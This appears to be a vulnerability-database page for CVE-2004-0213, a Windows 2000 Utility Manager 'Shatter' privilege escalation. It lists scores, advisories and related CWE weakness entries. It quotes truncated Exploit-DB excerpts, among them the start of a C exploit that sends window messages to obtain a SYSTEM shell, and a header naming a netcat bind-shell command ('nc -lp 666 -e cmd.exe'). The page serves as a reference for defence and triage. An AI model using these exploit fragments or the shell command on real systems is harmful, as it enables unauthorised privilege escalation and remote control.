CVE-2004-0213
published 2004-08-06CVE-2004-0213: Utility Manager in Windows 2000 launches winhlp32.exe while Utility Manager is running with raised privileges, which allows local users to gain system…
PriorityP338high7.8CVSS 3.1
AVLACLPRLUINSUCHIHAH
EXPLOIT
EPSS
21.26%
97.3th percentile
Utility Manager in Windows 2000 launches winhlp32.exe while Utility Manager is running with raised privileges, which allows local users to gain system privileges via a "Shatter" style attack that sends a Windows message to cause Utility Manager to launch winhlp32 by directly accessing the context sensitive help and bypassing the GUI, then sending another message to winhlp32 in order to open a user-selected file, a different vulnerability than CVE-2003-0908.
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wwxr-4g98-3vf6: The Utility Manager in Microsoft Windows 2000 executes winhlp32
ghsa_unreviewed·2022-04-29·CVSS 7.8
CVE-2003-0908 [HIGH] GHSA-wwxr-4g98-3vf6: The Utility Manager in Microsoft Windows 2000 executes winhlp32
The Utility Manager in Microsoft Windows 2000 executes winhlp32.exe with system privileges, which allows local users to execute arbitrary code via a "Shatter" style attack using a Windows message that accesses the context sensitive help button in the GUI, as demonstrated using the File Open dialog in the Help window, a different vulnerability than CVE-2004-0213.
GHSA
GHSA-62vf-wrg7-5x68: Utility Manager in Windows 2000 launches winhlp32
ghsa_unreviewed·2022-04-29·CVSS 7.2
CVE-2004-0213 [HIGH] CWE-306 GHSA-62vf-wrg7-5x68: Utility Manager in Windows 2000 launches winhlp32
Utility Manager in Windows 2000 launches winhlp32.exe while Utility Manager is running with raised privileges, which allows local users to gain system privileges via a "Shatter" style attack that sends a Windows message to cause Utility Manager to launch winhlp32 by directly accessing the context sensitive help and bypassing the GUI, then sending another message to winhlp32 in order to open a user-selected file, a different vulnerability than CVE-2003-0908.
No detection rules found.
Exploit-DB
Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)
exploitdb·2004-07-20
CVE-2004-0213 Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)
Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)
---
/******************************************************************************************
*****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4****
** [Crpt] Utility Manager exploit v2.666 modified by kralor [Crpt] **
** It gets system language and sets windows names to work on any win2k :P **
** Feel free to add other languages :) **
** v2.666: added autonomous (allinone) remote exploitation system ;) **
** It can be executed through poor cmd.exe shells (like nc -lp 666 -e cmd.exe from a **
** normal user account). Must be called with an argument (any argument) **
** You know where we are.. **
*****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4***
Exploit-DB
Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)
exploitdb·2004-07-17
CVE-2004-0213 Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)
Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)
---
/******************************************************************************************
****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4*****
** [Crpt] Utility Manager exploit v1.666 modified by kralor [Crpt] **
** It gets system language and sets windows names to work on any win2k :P **
** Feel free to add other languages :) **
** You know where we are.. **
*****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4****
******************************************************************************************/
/* original disclaimer */
//by Cesar Cerrudo sqlsec>at
#include
struct {
int id;
char *utilman;
char *winhelp;
char *open;
} lang[]
Exploit-DB
Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
exploitdb·2004-07-17
CVE-2004-0213 Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
---
/* Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit (MS04-020)
*
* Tested on windows 2k sp4 CN,NT/XP/2003 NOT TESTED
*
* Posixexp.c By bkbll (bkbll cnhonker net,bkbll tom com) www cnhonker com
*
* 2004/07/16
*
* thanks to eyas xfocus org
*
*
C:\>whoami
VITUALWIN2K\test
C:\>posixexp
Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit(1
By bkbll (bkbll#cnhonker.net,bkbll#tom.com) www.cnhonker.com
pax: illegal option--h
Usage: pax -[cimopuvy] [-f archive] [-s replstr] [-t device] [pattern.
pax -r [-cimopuvy] [-f archive] [-s replstr] [-t device] [patte
pax -w [-adimuvy] [-b blocking] [-f archive] [-s replstr]
[-t device] [-x format] [pathname...]
pax -r -w [-ilmopuvy] [
Exploit-DB
Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)
exploitdb·2004-07-14
CVE-2004-0213 Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)
Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)
---
//by Cesar Cerrudo sqlsec at yahoo.com
//Local elevation of priviliges exploit for Windows 2K Utility Manager (second one!!!!)
//Gives you a shell with system privileges
//If you have problems try changing Sleep() values.
#include "stdio.h"
#include "windows.h"
int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
char sText[]="%windir%\\system32\\cmd.ex?";
// run utility manager
// system("utilman.exe /start");
// Sleep(500);
lHandle=FindWindow(NULL, "Utility manager");
if (!lHandle) {
printf("\nUsage :\nPress Win Key+U to launch Utility Manager and then
run UtilManExploit2.exe\n");
return 0;
}
PostMessage(lHandle,0x313,NULL,NULL); //=right click on the app button
in the taskbar o
No writeups or analysis indexed.
CWE
Trust of System Event Data
mitre_cwe·CVSS 7.2
[HIGH] CWE-360 Trust of System Event Data
CWE-360: Trust of System Event Data
Security based on event locations are insecure and can be spoofed.
Events are a messaging system which may provide control data to programs listening for events. Events often do not have any type of authentication framework to allow them to be verified from a trusted source. Any application, in Windows, on a given desktop can send a message to any window on the same desktop. There is no authentication framework for these messages. Therefore, any message can be used to manipulate any process on the desktop if the process does not check the validity and safeness of those messages.
Modes of Introduction:
Phase: Architecture and Design
Phase: Implementation
Common Consequences:
Scope: Integrity, Confidentiality, Availability, Access Control. Impact: Gain
CWE
Privilege Dropping / Lowering Errors
mitre_cwe
CWE-271 Privilege Dropping / Lowering Errors
CWE-271: Privilege Dropping / Lowering Errors
The product does not drop privileges before passing control of a resource to an actor that does not have those privileges.
In some contexts, a system executing with elevated permissions will hand off a process/file/etc. to another process or user. If the privileges of an entity are not reduced, then elevated privileges are spread throughout a system and possibly to an attacker.
Modes of Introduction:
Phase: Architecture and Design
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Phase: Operation
Common Consequences:
Scope: Access Control. Impact: Gain Privileges or Assume Identity. If privileges are not dropped, neither are access rights of the user. Often these righ
CWE
Missing Authentication for Critical Function
mitre_cwe
CWE-306 Missing Authentication for Critical Function
CWE-306: Missing Authentication for Critical Function
The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.
Modes of Introduction:
Phase: Architecture and Design
Note: OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase.
Phase: Architecture and Design
Note: Developers sometimes perform authentication at the primary channel, but open up a secondary channel that is assumed to be private. For example, a login mechanism may be listening on one network port, but after successful authentication, it may open up a second port where it waits for the connection, but avoids authentication because it assumes that only the authenticated party will conne
CWE
Unprotected Windows Messaging Channel ('Shatter')
mitre_cwe·CVSS 4.6
[MEDIUM] CWE-422 Unprotected Windows Messaging Channel ('Shatter')
CWE-422: Unprotected Windows Messaging Channel ('Shatter')
The product does not properly verify the source of a message in the Windows Messaging System while running at elevated privileges, creating an alternate channel through which an attacker can directly send a message to the product.
Modes of Introduction:
Phase: Architecture and Design
Common Consequences:
Scope: Access Control. Impact: Gain Privileges or Assume Identity, Bypass Protection Mechanism.
Potential Mitigations:
[Architecture and Design] Always verify and authenticate the source of the message.
Observed Examples:
CVE-2002-0971: Bypass GUI and access restricted dialog box.
CVE-2002-1230: Gain privileges via Windows message.
CVE-2003-0350: A control allows a change to a pointer for a callback function using Windows mess
http://marc.info/?l=bugtraq&m=108975382413405&w=2http://www.kb.cert.org/vuls/id/868580http://www.us-cert.gov/cas/techalerts/TA04-196A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-019https://exchange.xforce.ibmcloud.com/vulnerabilities/16592https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2495http://marc.info/?l=bugtraq&m=108975382413405&w=2http://www.kb.cert.org/vuls/id/868580http://www.us-cert.gov/cas/techalerts/TA04-196A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-019https://exchange.xforce.ibmcloud.com/vulnerabilities/16592https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2495
2004-08-06
Published